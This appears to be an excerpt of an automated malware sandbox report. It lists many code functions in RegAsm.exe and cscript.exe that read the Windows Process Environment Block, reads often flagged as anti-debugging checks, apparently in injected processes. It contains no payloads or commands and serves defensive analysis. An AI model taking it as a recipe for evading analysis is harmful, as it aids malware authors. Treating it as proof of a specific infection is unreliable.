Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031EFDE2 mov eax, dword ptr fs:[00000030h] 2_2_031EFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031EFDE2 mov eax, dword ptr fs:[00000030h] 2_2_031EFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031EFDE2 mov eax, dword ptr fs:[00000030h] 2_2_031EFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031A6C0A mov eax, dword ptr fs:[00000030h] 2_2_031A6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031A6C0A mov eax, dword ptr fs:[00000030h] 2_2_031A6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031A6C0A mov eax, dword ptr fs:[00000030h] 2_2_031A6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031A6C0A mov eax, dword ptr fs:[00000030h] 2_2_031A6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F740D mov eax, dword ptr fs:[00000030h] 2_2_031F740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F740D mov eax, dword ptr fs:[00000030h] 2_2_031F740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F740D mov eax, dword ptr fs:[00000030h] 2_2_031F740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E1C06 mov eax, dword ptr fs:[00000030h] 2_2_031E1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0315BC2C mov eax, dword ptr fs:[00000030h] 2_2_0315BC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031BC450 mov eax, dword ptr fs:[00000030h] 2_2_031BC450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031BC450 mov eax, dword ptr fs:[00000030h] 2_2_031BC450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0315A44B mov eax, dword ptr fs:[00000030h] 2_2_0315A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0314746D mov eax, dword ptr fs:[00000030h] 2_2_0314746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0313849B mov eax, dword ptr fs:[00000030h] 2_2_0313849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F8CD6 mov eax, dword ptr fs:[00000030h] 2_2_031F8CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E14FB mov eax, dword ptr fs:[00000030h] 2_2_031E14FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031A6CF0 mov eax, dword ptr fs:[00000030h] 2_2_031A6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031A6CF0 mov eax, dword ptr fs:[00000030h] 2_2_031A6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031A6CF0 mov eax, dword ptr fs:[00000030h] 2_2_031A6CF0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB8CD6 mov eax, dword ptr fs:[00000030h] 6_2_04CB8CD6
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF849B mov eax, dword ptr fs:[00000030h] 6_2_04BF849B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA14FB mov eax, dword ptr fs:[00000030h] 6_2_04CA14FB
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66CF0 mov eax, dword ptr fs:[00000030h] 6_2_04C66CF0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66CF0 mov eax, dword ptr fs:[00000030h] 6_2_04C66CF0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66CF0 mov eax, dword ptr fs:[00000030h] 6_2_04C66CF0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1A44B mov eax, dword ptr fs:[00000030h] 6_2_04C1A44B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C7C450 mov eax, dword ptr fs:[00000030h] 6_2_04C7C450
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C7C450 mov eax, dword ptr fs:[00000030h] 6_2_04C7C450
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C0746D mov eax, dword ptr fs:[00000030h] 6_2_04C0746D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB740D mov eax, dword ptr fs:[00000030h] 6_2_04CB740D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB740D mov eax, dword ptr fs:[00000030h] 6_2_04CB740D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB740D mov eax, dword ptr fs:[00000030h] 6_2_04CB740D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1C06 mov eax, dword ptr fs:[00000030h] 6_2_04CA1C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66C0A mov eax, dword ptr fs:[00000030h] 6_2_04C66C0A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66C0A mov eax, dword ptr fs:[00000030h] 6_2_04C66C0A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66C0A mov eax, dword ptr fs:[00000030h] 6_2_04C66C0A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66C0A mov eax, dword ptr fs:[00000030h] 6_2_04C66C0A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1BC2C mov eax, dword ptr fs:[00000030h] 6_2_04C1BC2C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66DC9 mov eax, dword ptr fs:[00000030h] 6_2_04C66DC9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66DC9 mov eax, dword ptr fs:[00000030h] 6_2_04C66DC9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66DC9 mov eax, dword ptr fs:[00000030h] 6_2_04C66DC9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66DC9 mov ecx, dword ptr fs:[00000030h] 6_2_04C66DC9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66DC9 mov eax, dword ptr fs:[00000030h] 6_2_04C66DC9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C66DC9 mov eax, dword ptr fs:[00000030h] 6_2_04C66DC9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CAFDE2 mov eax, dword ptr fs:[00000030h] 6_2_04CAFDE2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CAFDE2 mov eax, dword ptr fs:[00000030h] 6_2_04CAFDE2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CAFDE2 mov eax, dword ptr fs:[00000030h] 6_2_04CAFDE2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CAFDE2 mov eax, dword ptr fs:[00000030h] 6_2_04CAFDE2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE2D8A mov eax, dword ptr fs:[00000030h] 6_2_04BE2D8A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE2D8A mov eax, dword ptr fs:[00000030h] 6_2_04BE2D8A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE2D8A mov eax, dword ptr fs:[00000030h] 6_2_04BE2D8A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE2D8A mov eax, dword ptr fs:[00000030h] 6_2_04BE2D8A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE2D8A mov eax, dword ptr fs:[00000030h] 6_2_04BE2D8A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C98DF1 mov eax, dword ptr fs:[00000030h] 6_2_04C98DF1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C12581 mov eax, dword ptr fs:[00000030h] 6_2_04C12581
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C12581 mov eax, dword ptr fs:[00000030h] 6_2_04C12581
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C12581 mov eax, dword ptr fs:[00000030h] 6_2_04C12581
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C12581 mov eax, dword ptr fs:[00000030h] 6_2_04C12581
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1FD9B mov eax, dword ptr fs:[00000030h] 6_2_04C1FD9B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1FD9B mov eax, dword ptr fs:[00000030h] 6_2_04C1FD9B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BFD5E0 mov eax, dword ptr fs:[00000030h] 6_2_04BFD5E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BFD5E0 mov eax, dword ptr fs:[00000030h] 6_2_04BFD5E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C135A1 mov eax, dword ptr fs:[00000030h] 6_2_04C135A1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB05AC mov eax, dword ptr fs:[00000030h] 6_2_04CB05AC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB05AC mov eax, dword ptr fs:[00000030h] 6_2_04CB05AC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C11DB5 mov eax, dword ptr fs:[00000030h] 6_2_04C11DB5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C11DB5 mov eax, dword ptr fs:[00000030h] 6_2_04C11DB5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C11DB5 mov eax, dword ptr fs:[00000030h] 6_2_04C11DB5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C23D43 mov eax, dword ptr fs:[00000030h] 6_2_04C23D43
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C63540 mov eax, dword ptr fs:[00000030h] 6_2_04C63540
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C93D40 mov eax, dword ptr fs:[00000030h] 6_2_04C93D40
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF3D34 mov eax, dword ptr fs:[00000030h] 6_2_04BF3D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BEAD30 mov eax, dword ptr fs:[00000030h] 6_2_04BEAD30
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C07D50 mov eax, dword ptr fs:[00000030h] 6_2_04C07D50
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C0C577 mov eax, dword ptr fs:[00000030h] 6_2_04C0C577
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C0C577 mov eax, dword ptr fs:[00000030h] 6_2_04C0C577
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C6A537 mov eax, dword ptr fs:[00000030h] 6_2_04C6A537
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CAE539 mov eax, dword ptr fs:[00000030h] 6_2_04CAE539
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C14D3B mov eax, dword ptr fs:[00000030h] 6_2_04C14D3B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C14D3B mov eax, dword ptr fs:[00000030h] 6_2_04C14D3B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C14D3B mov eax, dword ptr fs:[00000030h] 6_2_04C14D3B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB8D34 mov eax, dword ptr fs:[00000030h] 6_2_04CB8D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C28EC7 mov eax, dword ptr fs:[00000030h] 6_2_04C28EC7
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C9FEC0 mov eax, dword ptr fs:[00000030h] 6_2_04C9FEC0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C136CC mov eax, dword ptr fs:[00000030h] 6_2_04C136CC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB8ED6 mov eax, dword ptr fs:[00000030h] 6_2_04CB8ED6
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C116E0 mov ecx, dword ptr fs:[00000030h] 6_2_04C116E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C7FE87 mov eax, dword ptr fs:[00000030h] 6_2_04C7FE87
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF76E2 mov eax, dword ptr fs:[00000030h] 6_2_04BF76E2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C646A7 mov eax, dword ptr fs:[00000030h] 6_2_04C646A7
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB0EA5 mov eax, dword ptr fs:[00000030h] 6_2_04CB0EA5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB0EA5 mov eax, dword ptr fs:[00000030h] 6_2_04CB0EA5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB0EA5 mov eax, dword ptr fs:[00000030h] 6_2_04CB0EA5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CAAE44 mov eax, dword ptr fs:[00000030h] 6_2_04CAAE44
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CAAE44 mov eax, dword ptr fs:[00000030h] 6_2_04CAAE44
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BEE620 mov eax, dword ptr fs:[00000030h] 6_2_04BEE620
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C0AE73 mov eax, dword ptr fs:[00000030h] 6_2_04C0AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C0AE73 mov eax, dword ptr fs:[00000030h] 6_2_04C0AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C0AE73 mov eax, dword ptr fs:[00000030h] 6_2_04C0AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C0AE73 mov eax, dword ptr fs:[00000030h] 6_2_04C0AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C0AE73 mov eax, dword ptr fs:[00000030h] 6_2_04C0AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BEC600 mov eax, dword ptr fs:[00000030h] 6_2_04BEC600
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BEC600 mov eax, dword ptr fs:[00000030h] 6_2_04BEC600
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BEC600 mov eax, dword ptr fs:[00000030h] 6_2_04BEC600
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C18E00 mov eax, dword ptr fs:[00000030h] 6_2_04C18E00
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA1608 mov eax, dword ptr fs:[00000030h] 6_2_04CA1608
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF766D mov eax, dword ptr fs:[00000030h] 6_2_04BF766D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1A61C mov eax, dword ptr fs:[00000030h] 6_2_04C1A61C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1A61C mov eax, dword ptr fs:[00000030h] 6_2_04C1A61C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C9FE3F mov eax, dword ptr fs:[00000030h] 6_2_04C9FE3F
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF7E41 mov eax, dword ptr fs:[00000030h] 6_2_04BF7E41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF7E41 mov eax, dword ptr fs:[00000030h] 6_2_04BF7E41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF7E41 mov eax, dword ptr fs:[00000030h] 6_2_04BF7E41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF7E41 mov eax, dword ptr fs:[00000030h] 6_2_04BF7E41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF7E41 mov eax, dword ptr fs:[00000030h] 6_2_04BF7E41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF7E41 mov eax, dword ptr fs:[00000030h] 6_2_04BF7E41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BF8794 mov eax, dword ptr fs:[00000030h] 6_2_04BF8794
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C237F5 mov eax, dword ptr fs:[00000030h] 6_2_04C237F5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C67794 mov eax, dword ptr fs:[00000030h] 6_2_04C67794
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C67794 mov eax, dword ptr fs:[00000030h] 6_2_04C67794
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C67794 mov eax, dword ptr fs:[00000030h] 6_2_04C67794
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE4F2E mov eax, dword ptr fs:[00000030h] 6_2_04BE4F2E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE4F2E mov eax, dword ptr fs:[00000030h] 6_2_04BE4F2E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB8F6A mov eax, dword ptr fs:[00000030h] 6_2_04CB8F6A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB070D mov eax, dword ptr fs:[00000030h] 6_2_04CB070D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB070D mov eax, dword ptr fs:[00000030h] 6_2_04CB070D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1A70E mov eax, dword ptr fs:[00000030h] 6_2_04C1A70E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1A70E mov eax, dword ptr fs:[00000030h] 6_2_04C1A70E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C0F716 mov eax, dword ptr fs:[00000030h] 6_2_04C0F716
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C7FF10 mov eax, dword ptr fs:[00000030h] 6_2_04C7FF10
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C7FF10 mov eax, dword ptr fs:[00000030h] 6_2_04C7FF10
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BFFF60 mov eax, dword ptr fs:[00000030h] 6_2_04BFFF60
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1E730 mov eax, dword ptr fs:[00000030h] 6_2_04C1E730
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BFEF40 mov eax, dword ptr fs:[00000030h] 6_2_04BFEF40
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C7B8D0 mov eax, dword ptr fs:[00000030h] 6_2_04C7B8D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C7B8D0 mov ecx, dword ptr fs:[00000030h] 6_2_04C7B8D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C7B8D0 mov eax, dword ptr fs:[00000030h] 6_2_04C7B8D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C7B8D0 mov eax, dword ptr fs:[00000030h] 6_2_04C7B8D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C7B8D0 mov eax, dword ptr fs:[00000030h] 6_2_04C7B8D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C7B8D0 mov eax, dword ptr fs:[00000030h] 6_2_04C7B8D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE9080 mov eax, dword ptr fs:[00000030h] 6_2_04BE9080
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C63884 mov eax, dword ptr fs:[00000030h] 6_2_04C63884
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C63884 mov eax, dword ptr fs:[00000030h] 6_2_04C63884
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE58EC mov eax, dword ptr fs:[00000030h] 6_2_04BE58EC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE40E1 mov eax, dword ptr fs:[00000030h] 6_2_04BE40E1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE40E1 mov eax, dword ptr fs:[00000030h] 6_2_04BE40E1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BE40E1 mov eax, dword ptr fs:[00000030h] 6_2_04BE40E1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C120A0 mov eax, dword ptr fs:[00000030h] 6_2_04C120A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C120A0 mov eax, dword ptr fs:[00000030h] 6_2_04C120A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C120A0 mov eax, dword ptr fs:[00000030h] 6_2_04C120A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C120A0 mov eax, dword ptr fs:[00000030h] 6_2_04C120A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C120A0 mov eax, dword ptr fs:[00000030h] 6_2_04C120A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C120A0 mov eax, dword ptr fs:[00000030h] 6_2_04C120A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C290AF mov eax, dword ptr fs:[00000030h] 6_2_04C290AF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1F0BF mov ecx, dword ptr fs:[00000030h] 6_2_04C1F0BF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1F0BF mov eax, dword ptr fs:[00000030h] 6_2_04C1F0BF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C1F0BF mov eax, dword ptr fs:[00000030h] 6_2_04C1F0BF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C00050 mov eax, dword ptr fs:[00000030h] 6_2_04C00050
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C00050 mov eax, dword ptr fs:[00000030h] 6_2_04C00050
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BFB02A mov eax, dword ptr fs:[00000030h] 6_2_04BFB02A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BFB02A mov eax, dword ptr fs:[00000030h] 6_2_04BFB02A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BFB02A mov eax, dword ptr fs:[00000030h] 6_2_04BFB02A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04BFB02A mov eax, dword ptr fs:[00000030h] 6_2_04BFB02A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CA2073 mov eax, dword ptr fs:[00000030h] 6_2_04CA2073
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04CB1074 mov eax, dword ptr fs:[00000030h] 6_2_04CB1074
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C67016 mov eax, dword ptr fs:[00000030h] 6_2_04C67016
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C67016 mov eax, dword ptr fs:[00000030h] 6_2_04C67016
